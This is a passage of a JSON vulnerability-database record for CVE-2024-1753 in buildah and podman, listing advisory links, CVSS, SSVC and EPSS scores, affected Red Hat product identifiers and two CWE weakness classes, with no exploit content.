                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2098"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2548",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2548"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2645",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2645"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2669",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2669"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2672",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2672"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2784",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2784"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2877",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2877"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:3254",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:3254"
        },
        {
            "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-1753.json",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                }
            ],
            "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-1753.json"
        },
        {
            "reference_url": "https://access.redhat.com/security/cve/CVE-2024-1753",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/security/cve/CVE-2024-1753"
        },
        {
            "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-1753",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "0.00064",
                    "scoring_system": "epss",
                    "scoring_elements": "0.19976",
                    "published_at": "2026-04-02T12:55:00Z"
                },
                {
                    "value": "0.00064",
                    "scoring_system": "epss",
                    "scoring_elements": "0.20034",
                    "published_at": "2026-04-04T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22653",
                    "published_at": "2026-05-14T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22677",
                    "published_at": "2026-04-07T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22752",
                    "published_at": "2026-04-08T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22804",
                    "published_at": "2026-04-09T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22826",
                    "published_at": "2026-04-11T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22788",
                    "published_at": "2026-04-12T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22731",
                    "published_at": "2026-04-13T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22747",
                    "published_at": "2026-04-16T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22742",
                    "published_at": "2026-04-18T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22702",
                    "published_at": "2026-04-21T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.2254",
                    "published_at": "2026-04-24T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22531",
                    "published_at": "2026-04-26T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22529",
                    "published_at": "2026-04-29T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22433",
                    "published_at": "2026-05-05T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22517",
                    "published_at": "2026-05-07T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22595",
                    "published_at": "2026-05-09T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22561",
                    "published_at": "2026-05-11T12:55:00Z"
                },
                {
                    "value": "0.00076",
                    "scoring_system": "epss",
                    "scoring_elements": "0.22576",
                    "published_at": "2026-05-12T12:55:00Z"
                }
            ],
            "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-1753"
        },
        {
            "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2265513",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2265513"
        },
        {
            "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1753",
            "reference_id": "",
            "reference_type": "",
            "scores": [],
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1753"
        },
        {
            "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                }
            ],
            "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"
        },
        {
            "reference_url": "https://github.com/containers/buildah/security/advisories/GHSA-pmf3-c36m-g5cf",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://github.com/containers/buildah/security/advisories/GHSA-pmf3-c36m-g5cf"
        },
        {
            "reference_url": "https://github.com/containers/podman",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://github.com/containers/podman"
        },
        {
            "reference_url": "https://github.com/containers/podman/security/advisories/GHSA-874v-pj72-92f3",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://github.com/containers/podman/security/advisories/GHSA-874v-pj72-92f3"
        },
        {
            "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FCRZVUDOFM5CPREQKBEU2VK2QK62PSBP",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FCRZVUDOFM5CPREQKBEU2VK2QK62PSBP"
        },
        {
            "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KOYMVMQ7RWMDTSKQTBO734BE3WQPI2AJ",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KOYMVMQ7RWMDTSKQTBO734BE3WQPI2AJ"
        },
        {
            "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVBSVZGVABPYIHK5HZM472NPGWMI7WXH",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVBSVZGVABPYIHK5HZM472NPGWMI7WXH"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1753",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1753"
        },
        {
            "reference_url": "https://pkg.go.dev/vuln/GO-2024-2658",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://pkg.go.dev/vuln/GO-2024-2658"
        },
        {
            "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067800",
            "reference_id": "1067800",
            "reference_type": "",
            "scores": [],
            "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067800"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:8::appstream",
            "reference_id": "cpe:/a:redhat:enterprise_linux:8::appstream",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:8::appstream"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:9::appstream",
            "reference_id": "cpe:/a:redhat:enterprise_linux:9::appstream",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:9::appstream"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:3.11",
            "reference_id": "cpe:/a:redhat:openshift:3.11",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:3.11"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el8",
            "reference_id": "cpe:/a:redhat:openshift:4.12::el8",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el8"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el9",
            "reference_id": "cpe:/a:redhat:openshift:4.12::el9",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el9"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el8",
            "reference_id": "cpe:/a:redhat:openshift:4.13::el8",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el8"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el9",
            "reference_id": "cpe:/a:redhat:openshift:4.13::el9",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el9"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el8",
            "reference_id": "cpe:/a:redhat:openshift:4.14::el8",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el8"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el9",
            "reference_id": "cpe:/a:redhat:openshift:4.14::el9",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el9"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el8",
            "reference_id": "cpe:/a:redhat:openshift:4.15::el8",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el8"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el9",
            "reference_id": "cpe:/a:redhat:openshift:4.15::el9",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el9"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.6::appstream",
            "reference_id": "cpe:/a:redhat:rhel_eus:8.6::appstream",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.6::appstream"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.8::appstream",
            "reference_id": "cpe:/a:redhat:rhel_eus:8.8::appstream",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:8.8::appstream"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.0::appstream",
            "reference_id": "cpe:/a:redhat:rhel_eus:9.0::appstream",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.0::appstream"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.2::appstream",
            "reference_id": "cpe:/a:redhat:rhel_eus:9.2::appstream",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:rhel_eus:9.2::appstream"
        },
        {
            "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7",
            "reference_id": "cpe:/o:redhat:enterprise_linux:7",
            "reference_type": "",
            "scores": [],
            "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7"
        },
        {
            "reference_url": "https://security.gentoo.org/glsa/202407-12",
            "reference_id": "GLSA-202407-12",
            "reference_type": "",
            "scores": [],
            "url": "https://security.gentoo.org/glsa/202407-12"
        },
        {
            "reference_url": "https://security.gentoo.org/glsa/202407-25",
            "reference_id": "GLSA-202407-25",
            "reference_type": "",
            "scores": [],
            "url": "https://security.gentoo.org/glsa/202407-25"
        }
    ],
    "weaknesses": [
        {
            "cwe_id": 269,
            "name": "Improper Privilege Management",
            "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."
        },
        {
            "cwe_id": 59,
            "name": "Improper Link Resolution Before File Access ('Link Following')",
            "description": "The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource."
        }
    ],
    "exploits": [],
    "severity_range_score": "4.0 - 8.6",
    "exploitability": "0.5",
    "weighted_severity": "7.7",
    "risk_score": 3.9,
    "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gyyv-8fkv-syh5"
}